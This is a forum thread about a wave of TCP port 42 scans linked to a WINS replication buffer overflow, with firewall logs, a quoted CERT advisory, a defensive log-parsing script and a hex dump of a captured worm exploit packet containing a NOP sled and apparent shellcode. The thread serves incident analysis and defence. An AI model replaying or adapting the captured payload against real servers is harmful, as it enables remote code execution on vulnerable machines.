CrookedSmile (Member)
join:2003-08-23
Lawrenceville, GA
Something new on port 42?

Has a new exploit come out today that takes advantage of port 42? Starting about 21:46 east coast time Sunday night I've been hit regularly, and from a wide variety of IP ranges, on this port. It's mostly TCP inbound stuff and doesn't sneak past the wall, but it happened to occur at the same time as an increase in hits on some totally unusual ports. Since port 42 started getting hit I've seen an increase on ports 40604, 11768, 55140, and a big jump in 22's numbers. I haven't heard or read anything on the forums here or elsewhere to state what this might be, but I'm curious if it's affecting anyone else or if it's something I need to worry about. DShield isn't providing results when I try to use its database for ports, so I'm in the dark for now.

Name Game (Premium Member)
join:2002-07-07
Grand Rapids, MI
»isc.sans.org//port_detai ··· ?port=42

This port is used in WINS replication. For more information see Microsoft KB#179442

TCP Port 42 port scans? What the heck over...
»www.derkeiler.com/Mailin ··· 509.html
see here for what is happening
»www.mynetwatchman.com/LI ··· 40488860
Name Game (Premium Member) to CrookedSmile
Microsoft announces WINS exploit
Affects all versions of Windows servers, but who still uses WINS?
posted 8:57am EST Mon Dec 06 2004 - submitted by J. Eric Smith

Warm up the mouse buttons, it's patch time again for Windows users. Microsoft has acknowledged a flaw in the Windows Internet Naming Service (WINS) that could allow an attack to be launched against the system. All systems using WINS, which include NT 4.0, Windows 2000, and Windows Server 2003, are affected.

The attack takes the form of a buffer overflow, where the WINS server is sent messages too large for it to handle. By carefully crafting specific data packets, an attacker could exploit this to execute arbitrary code on an affected machine. Secunia currently rates this as a "moderately critical" vulnerability.

Microsoft issued a directive temporarily fixing the issue, but points out that WINS is no longer installed by default and very few organizations still use it. Microsoft's advice is to restrict traffic between WINS servers using IP security features built into Windows. Or, if you're not using WINS, just turn it off.

Microsoft also announced that this bug will be fixed in its next upcoming monthly patch release.

»www.geek.com/news/geekne ··· 8102.htm
CrookedSmile (Member)

Thanks for the quick reply on that! It definitely helps make the morning easier.

There are a couple of slight differences between their case and mine. I decided to drop some examples of what hit me this morning in case anyone else is interested. I didn't capture any packets when it hit, as it didn't trip Snort. As of 10:01 east coast time all hits on 42 stopped entirely. Nothing to capture means this ends for me at this time. Thanks again!

08:26:15 kernel IN=eth1 OUT= MAC=mywanmac SRC=24.85.145.248 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=112 ID=27602 DF PROTO=TCP SPT=1990 DPT=42 WINDOW=64240 RES=0x00 SYN URGP=0
08:38:13 kernel IN=eth1 OUT= MAC=mywanmac SRC=24.71.44.140 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=111 ID=32586 DF PROTO=TCP SPT=3557 DPT=42 WINDOW=16384 RES=0x00 SYN URGP=0
09:03:33 kernel IN=eth1 OUT= MAC=mywanmac SRC=195.146.60.24 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=106 ID=16314 DF PROTO=TCP SPT=2423 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0
10:01:21 kernel IN=eth1 OUT= MAC=mywanmac SRC=24.87.205.250 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=112 ID=62750 DF PROTO=TCP SPT=3218 DPT=42 WINDOW=16384 RES=0x00 SYN URGP=0

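Two log formats appear in this thread: the netfilter "kernel" lines CrookedSmile posted above and the Link Logger "(TCP) src : sport >>> dst : dport" lines further down. The script below is an added example, not code posted by anyone in the thread. It parses both formats into one record shape, groups inbound TCP hits by destination port, and flags ports that are being probed from several unrelated /24 networks, which is the property that separates the tcp/42 sweep from a single infected neighbour hammering tcp/135. The sample lines are constructed from entries quoted in the thread (the poster's masked mywanip/mywanmac fields are left as posted); the port-to-service table and the thresholds are assumptions.

```python
"""Group inbound TCP SYN log lines by destination port and flag ports that
are being probed from many unrelated source networks.

Added example, not code posted in the thread. It parses the two formats
quoted above: Linux netfilter "kernel" lines (SRC=... DPT=42 ... SYN) and
Link Logger lines ("(TCP) src : sport >>> dst : dport"). SAMPLE_LINES is
constructed from entries quoted in the thread; the poster's masked fields
(mywanip, mywanmac) are left as posted.
"""
import re
from collections import defaultdict

NETFILTER_RE = re.compile(
    r"SRC=(?P<src>\S+)\s+DST=(?P<dst>\S+).*?PROTO=(?P<proto>\w+)"
    r"\s+SPT=(?P<sport>\d+)\s+DPT=(?P<dport>\d+)"
)
LINKLOGGER_RE = re.compile(
    r"\((?P<proto>TCP|UDP)\)\s+(?P<src>\S+)\s*:\s*(?P<sport>\d+)\s*>>>\s*"
    r"(?P<dst>\S+)\s*:\s*(?P<dport>\d+)"
)

# Assumed lookup table; tcp/42 is WINS replication, as the thread notes.
KNOWN_PORTS = {22: "SSH", 42: "WINS replication", 135: "MS-RPC", 445: "SMB"}

# Constructed from lines quoted in the thread (four netfilter lines, then
# Link Logger lines for tcp/42 from three sources and tcp/135 from one).
SAMPLE_LINES = [
    "08:26:15 kernel IN=eth1 OUT= MAC=mywanmac SRC=24.85.145.248 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=112 ID=27602 DF PROTO=TCP SPT=1990 DPT=42 WINDOW=64240 RES=0x00 SYN URGP=0",
    "08:38:13 kernel IN=eth1 OUT= MAC=mywanmac SRC=24.71.44.140 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=111 ID=32586 DF PROTO=TCP SPT=3557 DPT=42 WINDOW=16384 RES=0x00 SYN URGP=0",
    "09:03:33 kernel IN=eth1 OUT= MAC=mywanmac SRC=195.146.60.24 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=106 ID=16314 DF PROTO=TCP SPT=2423 DPT=42 WINDOW=65535 RES=0x00 SYN URGP=0",
    "10:01:21 kernel IN=eth1 OUT= MAC=mywanmac SRC=24.87.205.250 DST=mywanip LEN=48 TOS=0x00 PREC=0x00 TTL=112 ID=62750 DF PROTO=TCP SPT=3218 DPT=42 WINDOW=16384 RES=0x00 SYN URGP=0",
    "Jan 02, 2005 03:14:51.296 - (TCP) 220.82.219.235 : 1543 >>> 68.144.238.64 : 42",
    "Jan 01, 2005 17:07:20.640 - (TCP) 68.84.122.53 : 4535 >>> 68.144.238.64 : 42",
    "Jan 02, 2005 07:29:44.739 - (TCP) 207.191.107.34 : 39063 >>> 68.144.238.148 : 42",
    "Jan 03, 2005 16:25:15.358 - (TCP) 68.144.235.53 : 3745 >>> 68.144.238.148 : 135",
    "Jan 03, 2005 15:53:41.505 - (TCP) 68.144.235.53 : 3423 >>> 68.144.238.148 : 135",
    "Jan 03, 2005 15:03:49.102 - (TCP) 68.144.235.53 : 2069 >>> 68.144.238.148 : 135",
]


def parse_line(line):
    """Return a dict (proto, src, sport, dst, dport) or None if the line
    is in neither format."""
    for rx in (NETFILTER_RE, LINKLOGGER_RE):
        m = rx.search(line)
        if m:
            return {
                "proto": m.group("proto").upper(),
                "src": m.group("src"),
                "sport": int(m.group("sport")),
                "dst": m.group("dst"),
                "dport": int(m.group("dport")),
            }
    return None


def slash24(ip):
    """Collapse an IPv4 address to its /24 so that one noisy neighbour
    does not look like 'a wide variety of IP ranges'."""
    parts = ip.split(".")
    return ".".join(parts[:3]) + ".0/24" if len(parts) == 4 else ip


def summarize(lines):
    """Per destination port: hit count, distinct sources, distinct /24s."""
    by_port = defaultdict(lambda: {"hits": 0, "sources": set(), "nets": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["proto"] != "TCP":
            continue
        entry = by_port[rec["dport"]]
        entry["hits"] += 1
        entry["sources"].add(rec["src"])
        entry["nets"].add(slash24(rec["src"]))
    return by_port


def flag_wide_probes(by_port, min_hits=3, min_nets=3):
    """Ports hit at least min_hits times from at least min_nets distinct
    /24 networks, as (port, service, hits, distinct_nets)."""
    flagged = []
    for port, e in sorted(by_port.items()):
        if e["hits"] >= min_hits and len(e["nets"]) >= min_nets:
            flagged.append((port, KNOWN_PORTS.get(port, "unknown"), e["hits"], len(e["nets"])))
    return flagged


def report(lines=SAMPLE_LINES):
    return flag_wide_probes(summarize(lines))


if __name__ == "__main__":
    for port, svc, hits, nets in report():
        print(f"tcp/{port} ({svc}): {hits} hits from {nets} distinct /24s")
```

On the constructed sample this reports only tcp/42 (7 hits from 7 distinct /24s); the three tcp/135 hits all come from one host and stay below the network-diversity threshold, which is the right outcome for a lone infected machine on the same ISP.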
Link Logger (MVM) to CrookedSmile
join:2001-03-29
Calgary, AB
I've seen just a couple here, but the pots are now on and tuned to capture this:

Jan 02, 2005 03:14:51.296 - (TCP) 220.82.219.235 : 1543 >>> 68.144.238.64 : 42
Jan 02, 2005 03:14:51.281 - (TCP) 220.82.219.235 : 1545 >>> 68.144.238.64 : 42
Jan 02, 2005 03:14:44.765 - (TCP) 220.82.219.235 : 1545 >>> 68.144.238.64 : 42
Jan 02, 2005 03:14:44.765 - (TCP) 220.82.219.235 : 1543 >>> 68.144.238.64 : 42
Jan 02, 2005 03:14:42.265 - (TCP) 220.82.219.235 : 1545 >>> 68.144.238.64 : 42
Jan 02, 2005 03:14:42.250 - (TCP) 220.82.219.235 : 1543 >>> 68.144.238.64 : 42
Jan 01, 2005 17:07:20.640 - (TCP) 68.84.122.53 : 4535 >>> 68.144.238.64 : 42

*Edit*
From a second IP that I monitor

Jan 02, 2005 07:29:44.739 - (TCP) 207.191.107.34 : 39063 >>> 68.144.238.148 : 42
Jan 02, 2005 07:29:41.825 - (TCP) 207.191.107.34 : 39063 >>> 68.144.238.148 : 42
Jan 01, 2005 17:07:43.768 - (TCP) 68.84.122.53 : 3134 >>> 68.144.238.148 : 42

Blake

Name Game (Premium Member) to CrookedSmile
2004-12-22 -
The recent rash of port scans targeting tcp/42 is likely sourced from malware which is attempting to exploit vulnerabilities in the Microsoft WINS - Windows Internet Naming Service:
VU#145134 - Microsoft Windows Internet Naming Service (WINS) replication protocol contains a heap-based buffer overflow

Overview
A buffer overflow vulnerability in the Microsoft Windows Internet Naming Service (WINS) replication protocol may allow a remote attacker to execute arbitrary code or cause a denial-of-service condition.
I. Description
The Microsoft WINS service maps IP addresses to NetBIOS computer names. WINS servers share information via a server-to-server replication protocol that operates on TCP port 42. Connection information for replication peers is stored in a data structure called the association context. Insufficient validation of the buffer where the association context data structure is written allows a heap-based buffer overflow to occur. If a remote attacker supplies a specially crafted replication packet to a vulnerable WINS server, that attacker may be able to exploit the buffer overflow to write arbitrary data to WINS server process memory.

»www.kb.cert.org/vuls/id/145134

Link Logger (MVM) to CrookedSmile
PortPeeker capture of the new TCP port 42 exploit. First some scan history from the offending IP address, as I have seen scans from this system before. Granted, not all the scans might have been from the exact same system, as the scans go back a long way; however, I would suspect some of the more recent scans (i.e. from Jan 3rd on) to be from the same system. So you can see this system was previously infected and has now picked up a new worm.

Jan 03, 2005 16:26:39.238 - (TCP) 68.144.235.53 : 3365 >>> 192.168.1.35 : 42
Jan 03, 2005 16:25:15.358 - (TCP) 68.144.235.53 : 3745 >>> 68.144.238.148 : 135
Jan 03, 2005 15:53:41.505 - (TCP) 68.144.235.53 : 3423 >>> 68.144.238.148 : 135
Jan 03, 2005 15:53:38.470 - (TCP) 68.144.235.53 : 3423 >>> 68.144.238.148 : 135
Jan 03, 2005 15:53:36.047 - (TCP) 68.144.235.53 : 3267 >>> 68.144.238.148 : 135
Jan 03, 2005 15:53:33.092 - (TCP) 68.144.235.53 : 3267 >>> 68.144.238.148 : 135
Jan 03, 2005 15:03:49.102 - (TCP) 68.144.235.53 : 2069 >>> 68.144.238.148 : 135
Jan 03, 2005 14:57:19.191 - (TCP) 68.144.235.53 : 3906 >>> 68.144.238.148 : 135
Jan 03, 2005 14:53:17.814 - (TCP) 68.144.235.53 : 2428 >>> 68.144.238.148 : 135
Jan 03, 2005 14:50:19.317 - (TCP) 68.144.235.53 : 2370 >>> 68.144.238.148 : 135
Jan 03, 2005 14:41:20.052 - (TCP) 68.144.235.53 : 2255 >>> 68.144.238.148 : 135
Jan 03, 2005 14:33:51.797 - (TCP) 68.144.235.53 : 2175 >>> 68.144.238.148 : 135
Jan 03, 2005 14:30:36.016 - (TCP) 68.144.235.53 : 2192 >>> 68.144.238.148 : 135
Jan 03, 2005 14:26:47.227 - (TCP) 68.144.235.53 : 2077 >>> 68.144.238.148 : 135
Jan 03, 2005 14:20:53.839 - (TCP) 68.144.235.53 : 1754 >>> 68.144.238.148 : 135
Jan 03, 2005 14:19:19.143 - (TCP) 68.144.235.53 : 2177 >>> 68.144.238.148 : 135
Jan 03, 2005 14:10:56.880 - (TCP) 68.144.235.53 : 2105 >>> 68.144.238.148 : 135
Jan 03, 2005 14:06:55.533 - (TCP) 68.144.235.53 : 2467 >>> 68.144.238.148 : 135
Jan 03, 2005 14:00:53.152 - (TCP) 68.144.235.53 : 2347 >>> 68.144.238.148 : 135
Jan 03, 2005 13:51:57.973 - (TCP) 68.144.235.53 : 2049 >>> 68.144.238.148 : 135
Jan 03, 2005 13:50:59.719 - (TCP) 68.144.235.53 : 1413 >>> 68.144.238.148 : 135
Jan 03, 2005 13:32:23.744 - (TCP) 68.144.235.53 : 1589 >>> 68.144.238.148 : 135
Jan 03, 2005 13:32:20.720 - (TCP) 68.144.235.53 : 1589 >>> 68.144.238.148 : 135
Jan 03, 2005 12:26:59.031 - (TCP) 68.144.235.53 : 3562 >>> 68.144.238.148 : 135
Jan 03, 2005 12:26:56.217 - (TCP) 68.144.235.53 : 3562 >>> 68.144.238.148 : 135
Apr 27, 2004 23:03:47.495 - (TCP) 68.144.235.53 : 1767 >>> 68.144.239.163 : 135
Apr 27, 2004 23:03:47.475 - (TCP) 68.144.235.53 : 1775 >>> 68.144.239.163 : 1025
Apr 27, 2004 23:03:47.455 - (TCP) 68.144.235.53 : 1829 >>> 68.144.239.163 : 445
Apr 27, 2004 23:03:41.477 - (TCP) 68.144.235.53 : 1829 >>> 68.144.239.163 : 445
Apr 27, 2004 23:03:41.457 - (TCP) 68.144.235.53 : 1775 >>> 68.144.239.163 : 1025
Apr 27, 2004 23:03:41.437 - (TCP) 68.144.235.53 : 1767 >>> 68.144.239.163 : 135
Apr 27, 2004 23:03:38.513 - (TCP) 68.144.235.53 : 1829 >>> 68.144.239.163 : 445
Apr 27, 2004 23:03:38.492 - (TCP) 68.144.235.53 : 1775 >>> 68.144.239.163 : 1025
Apr 27, 2004 23:03:38.452 - (TCP) 68.144.235.53 : 1767 >>> 68.144.239.163 : 135
Apr 27, 2004 18:31:29.412 - (TCP) 68.144.235.53 : 3014 >>> 68.144.239.163 : 445
Apr 27, 2004 18:31:29.392 - (TCP) 68.144.235.53 : 3010 >>> 68.144.239.163 : 1025
Apr 27, 2004 18:31:29.312 - (TCP) 68.144.235.53 : 2989 >>> 68.144.239.163 : 135

PortPeeker Capture
------------------
TCP Connection Request
---- 03/01/2005 16:35:41.151

68.144.235.53 : 3365 TCP Connected ID = 1
---- 03/01/2005 16:35:41.151
Status Code: 0 OK

68.144.235.53 : 3365 TCP Data In Length 1460 bytes
MD5 = 1E014250BE3EF36C51A9DB4912B77D57
---- 03/01/2005 16:35:43.925
0000 00 03 0D 4C 77 77 FF 77 05 4E 00 3C 01 02 03 04 ...Lww.w.N.....
0010 6C F4 3D 05 00 02 4E 05 00 02 4E 05 00 02 4E 05 l.=...N...N...N.
0020 00 02 4E 05 00 02 4E 05 00 02 4E 05 00 02 4E 05 ..N...N...N...N.
0030 00 02 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0040 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0050 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
0060 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0070 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
0080 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0090 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
00A0 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
00B0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
00C0 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
00D0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
00E0 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
00F0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0100 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
0110 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0120 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
0130 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0140 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
0150 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0160 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0170 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
0180 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0190 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
01A0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
01B0 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
01C0 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
01D0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
01E0 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
01F0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0200 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
0210 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0220 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
0230 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0240 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
0250 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0260 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
0270 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0280 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0290 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
02A0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
02B0 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
02C0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
02D0 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
02E0 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
02F0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
0300 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0310 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0320 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
0330 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0340 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
0350 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0360 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
0370 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0380 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
0390 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
03A0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
03B0 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
03C0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
03D0 90 00 4E 05 90 03 4E 05 90 00 4E 05 90 01 4E 05 ..N...N...N...N.
03E0 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
03F0 90 00 4E 05 90 00 4E 05 90 03 4E 05 90 00 4E 05 ..N...N...N...N.
0400 90 01 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0410 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 03 4E 05 ..N...N...N...N.
0420 90 00 4E 05 90 01 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0430 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0440 90 03 4E 05 90 00 4E 05 90 01 4E 05 90 00 4E 05 ..N...N...N...N.
0450 90 00 4E 05 90 00 4E 05 90 00 4E 05 90 00 4E 05 ..N...N...N...N.
0460 90 00 4E 05 90 03 4E 05 90 00 4E 05 9E 2F 9F 43 ..N...N...N../.C
0470 95 49 43 45 95 9F F8 F9 93 49 90 4E FD 48 FD 92 .ICE.....I.N.H..
0480 41 4F 47 4D 4B 95 FD 46 F8 93 48 F8 3F 4B 9E 98 AOGMK..F..H.?K..
0490 48 FD 40 F9 37 93 4E 2F F8 4D 48 48 93 9E 37 93 H.@.7.N/.MHH..7.
04A0 9E 41 FD 4B 95 FD 4D 46 41 40 41 FC 4F 97 49 4E .A.K..MFA@A.O.IN
04B0 4A F9 97 40 4F F8 F5 47 27 4F 92 47 2F 46 F8 F9 J..@O..G'O.G/F..
04C0 F5 48 97 48 F8 F8 F9 90 91 45 49 45 98 4B 97 F9 .H.H.....EIE.K..
04D0 37 F8 F8 40 48 49 F9 96 97 4F 4F 49 4F 48 F9 96 7..@HI...OOIOH..
04E0 27 F9 37 27 3F F8 42 2F 93 4F 43 47 2F 4D 99 37 '.7'?.B/.OCG/M.7
04F0 4A 9E 42 F8 49 9F 4E FC 97 46 96 90 98 F8 27 F8 J.B.I.N..F....'.
0500 91 4F 9F 2F F9 4D F9 48 46 40 27 42 41 95 4B 45 .O./.M.HF@'BA.KE
0510 98 4E 9F 4E 99 46 48 46 99 40 2F 43 4B 95 F5 46 .N.N.FHF.@/CK..F
0520 4F 96 37 46 4E 93 48 42 F8 93 27 27 43 FD 43 93 O.7FN.HB..''C.C.
0530 90 40 90 40 93 F8 40 95 95 9E 46 37 49 41 47 FC .@.@..@...F7IAG.
0540 9F 49 4F 37 99 FC 96 45 4E 27 4E 96 47 F9 97 98 .IO7...EN'N.G...
0550 4D 90 91 40 4D 41 4D F8 4E 47 F9 FC 9E F9 9F 27 M..@MAM.NG.....'
0560 4B 99 40 43 37 95 4F 49 4A 90 96 9E 47 41 4F 46 K.@C7.OIJ...GAOF
0570 F9 48 41 F5 47 3F 9E 4A 92 90 43 96 90 97 F5 43 .HA.G?.J..C....C
0580 42 3F 49 46 48 96 40 FD 99 93 4B 93 46 FC 95 4B B?IFH.@...K.F..K
0590 95 F8 4D 49 3F 9E F8 48 45 98 47 92 2F 4D 4A 4E ..MI?..HE.G./MJN
05A0 46 FC 97 4D FD F5 90 FD 9E FD 96 F8 45 F5 4F 4F F..M........E.OO
05B0 F5 49 9E 27 .I.'

---- Echoed Data

68.144.235.53 : 3365 TCP Data In Length 1460 bytes
MD5 = 5B5E840EB87C75C966778A6DF09BA364
---- 03/01/2005 16:35:43.975
0000 47 4A F8 43 98 FD 90 99 42 9F 47 97 47 47 97 FC GJ.C....B.G.GG..
0010 43 47 F5 F9 4E 47 97 90 49 46 40 97 95 4E 91 46 CG..NG..IF@..N.F
0020 98 F5 2F 95 37 F5 4B 48 27 4D 91 4E 43 97 F8 49 ../.7.KH'M.NC..I
0030 9E 93 F9 F9 90 4B 49 37 91 9E F5 93 4D F5 3F F8 .....KI7....M.?.
0040 41 FD 96 4B FD 92 4B 45 FC 27 96 4B 91 98 48 4D A..K..KE.'.K..HM
0050 37 99 4E 3F F9 FC 3F 47 46 98 47 42 F8 99 49 4A 7.N?..?GF.GB..IJ
0060 96 97 40 47 92 9E F8 3F 46 92 47 37 2F 48 41 4E ..@G...?F.G7/HAN
0070 48 3F 42 96 37 45 45 27 FC 40 F8 46 4F 9E 99 99 H?B.7EE'.@.FO...
0080 48 4D 93 4D 41 99 90 9F 4B 96 4F 4D 43 90 FD 98 HM.MA...K.OMC...
0090 F8 3F 93 4B 99 97 4D 90 47 46 92 4A 43 91 48 4E .?.K..M.GF.JC.HN
00A0 95 43 FC 4B 93 4A 4F 91 40 FD 3F 4E 93 99 47 41 .C.K.JO.@.?N..GA
00B0 3F 48 F9 3F 40 3F 42 42 41 4A 99 98 99 27 46 4B ?H.?@?BBAJ...'FK
00C0 99 93 97 3F 47 9E 40 4B F5 4A 98 4E 40 99 95 97 ...?G.@K.J.N@...
00D0 98 46 3F 48 49 4D 92 37 FC 2F 96 4E 4F 49 37 99 .F?HIM.7./.NOI7.
00E0 41 3F FD 47 43 43 37 4A 96 45 37 9E F5 45 48 42 A?.GCC7J.E7..EHB
00F0 96 90 27 99 45 27 3F 43 9F 46 4B 4E F9 4A 4E 92 ..'.E'?C.FKN.JN.
0100 48 F8 41 4E F8 90 93 96 42 49 4D FC F5 42 93 93 H.AN....BIM..B..
0110 98 91 47 42 41 4D 3F 46 F8 F9 4E 2F 43 96 97 37 ..GBAM?F..N/C..7
0120 4B 4D 4F F5 41 49 4B 4A 4A 99 2F 49 90 43 9E 27 KMO.AIKJJ./I.C.'
0130 45 93 93 40 93 43 43 41 99 98 47 45 42 97 40 F5 E..@.CCA..GEB.@.
0140 F9 93 97 45 9F FC 27 40 47 4F 47 98 98 90 49 37 ...E..'@GOG...I7
0150 FC 9F 4B 48 98 4A 42 43 27 41 FD 98 96 FD 45 96 ..KH.JBC'A....E.
0160 4E 9E 45 97 96 48 97 9E 99 4B 4D 27 37 2F 46 43 N.E..H...KM'7/FC
0170 9F 92 48 F8 49 47 49 49 99 96 97 40 F8 27 2F F9 ..H.IGII...@.'/.
0180 4E F9 97 F5 99 F8 FC 4E 9E 40 4A 43 2F 49 98 45 N......N.@JC/I.E
0190 96 4B 92 91 42 F8 4E 91 97 4B 46 27 95 FC 4B F8 .K..B.N..KF'..K.
01A0 4D 37 F5 47 97 4E 98 92 4D 49 43 98 49 4E 49 4E M7.G.N..MIC.ININ
01B0 97 96 96 95 96 2F 91 40 47 F5 47 2F 43 96 27 48 ...../.@G.G/C.'H
01C0 98 F8 91 2F 9E 43 37 95 99 96 40 F5 41 43 95 37 .../.C7...@.AC.7
01D0 49 47 43 99 F5 95 37 4A 48 4D 41 FC 37 41 96 4B IGC...7JHMA.7A.K
01E0 90 9E F8 4A F8 48 F9 90 90 9F 4A 3F 41 48 98 90 ...J.H....J?AH..
01F0 96 FC 96 40 42 41 2F F9 40 96 37 41 43 42 46 95 ...@BA/.@.7ACBF.
0200 92 47 F8 41 41 4D 99 9F F5 41 95 90 4E F5 4F 92 .G.AAM...A..N.O.
0210 4A 48 40 93 40 27 FD 47 46 46 92 F8 48 40 4B 4B JH@.@'.GFF..H@KK
0220 96 2F 99 4D 2F 4D 27 4D 3F 91 42 2F 95 FD 98 2F ./.M/M'M?.B/.../
0230 2F 2F 4A FD 90 99 FD 93 F9 FC FD 41 90 9E 9F F9 //J........A....
0240 97 9F 90 4D 4F 43 37 96 F5 97 42 43 41 99 2F 93 ...MOC7...BCA./.
0250 47 48 37 91 98 42 41 42 FC 46 43 4A 99 45 96 99 GH7..BAB.FCJ.E..
0260 49 42 4A 48 2F 43 40 F5 42 FD 90 42 4A 99 47 2F IBJH/C@.B..BJ.G/
0270 46 49 93 92 48 97 4F 4A 91 95 43 3F 99 41 FD F8 FI..H.OJ..C?.A..
0280 9E 93 F8 9F 3F 49 3F F5 97 9E 47 46 9E F8 3F 4E ....?I?...GF..?N
0290 42 48 47 93 48 93 37 FD 45 99 98 46 49 47 42 F8 BHG.H.7.E..FIGB.
02A0 91 FC 90 4A 9E 40 41 3F 95 37 45 49 91 42 41 47 ...J.@A?.7EI.BAG
02B0 3F 4F F9 95 43 FD 43 F8 93 40 4B 92 3F 4B 4B 43 ?O..C.C..@K.?KKC
02C0 4E 92 41 37 46 91 95 41 F8 2F F9 F8 95 FD 41 48 N.A7F..A./....AH
02D0 27 2F 37 45 96 FD 99 F9 F8 4D 93 96 97 4D F9 46 '/7E.....M...M.F
02E0 45 F9 98 90 4D 40 41 45 48 4B 41 47 46 27 46 92 E...M@AEHKAGF'F.
02F0 F8 43 91 40 2F 90 48 4D 92 3F 46 46 4F F8 FD FD .C.@/.HM.?FFO...
0300 43 93 46 F5 40 93 46 4E 93 4B 4A F8 45 4E 4D 43 C.F.@.FN.KJ.ENMC
